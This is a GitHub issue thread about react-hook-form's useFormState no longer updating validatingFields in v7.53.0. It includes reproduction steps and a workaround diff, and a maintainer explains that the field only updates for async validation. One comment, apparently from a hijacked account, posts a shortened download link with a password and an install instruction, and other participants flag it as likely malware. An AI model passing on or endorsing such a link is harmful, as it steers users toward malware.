### ISSUE TITLE
issue: `useFormState` no longer updates `validatingFields`

### ISSUE THREAD

**Issue by slax57** [react-hook-form/react-hook-form#12217]
### Version Number

7.53.0

### Codesandbox/Expo snack

https://codesandbox.io/p/sandbox/gifted-panka-kctr6s?workspaceId=80f74b7c-dae1-4b05-9812-bc10dfaaf558

### Steps to reproduce

1. Load the form
2. Leave the 'First Name' field empty
3. Click on 'Submit'
4. Notice it says `ERRORS: []`, although the field is required
5. Notice the line `effect triggered!!` is only present **once** in the DevTools console

### Expected behaviour

1. It should say `ERRORS: ["firstName"]`
2. The line `effect triggered!!` should be present **twice** in the DevTools console

**Additional info**

This problem only occurs with **RHF v7.53.0**. It does not occur with **RHF v7.52.2**.

If you replace the effects dependencies by the following, then the effect runs as expected:

```diff
  const errorsNames = Object.keys(errors);
  React.useEffect(() => {
    console.log("effect triggered!!", { errors, validatingFields });
    setErrorsState(Object.keys(errors));
  }, [
-   errors,
+   JSON.stringify(errorsNames),
    JSON.stringify(validatingFieldsNames),
  ]);
```

However, this is more of a workaround to me, as it used to work before.

I have tracked down the issue to be the `validatingFields` object (obtained from `useFormState`), which no longer seems to change on submission since RHF v7.53.0.
That's why I believe this is a bug.

Thank you for your time, and, needless to say, we are still very grateful for this awesome lib and all the work you've done :slightly_smiling_face: 

### What browsers are you seeing the problem on?

Chrome

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by slax57** [comment]
Can a moderator remove the comment from @YeGop0218 ? It seems like a malware or phishing attempt to me...
(already reported to Github)

**Comment by YeGop0218** [comment]
> Referenc

My account was logged in by a guy in Chicago. It's a viral link

**Comment by slax57** [comment]
> My account was logged in by a guy in Chicago. It's a viral link

Can you remove it yourself then?

**Comment by YeGop0218** [comment]
> > My account was logged in by a guy in Chicago. It's a viral link
> 
> Can you remove it yourself then?

I deleted the software and changed the password, but my account has sent this link in many help zones and I am slowly deleting it now

**Comment by bluebill1049** [comment]
`validatingFields` will only trigger for async validation rules, there is no point in sending validateFields if the validation is just sync validation, it causes way too much re-render.

**Comment by slax57** [comment]
I see. Thank you so much for the explanation.
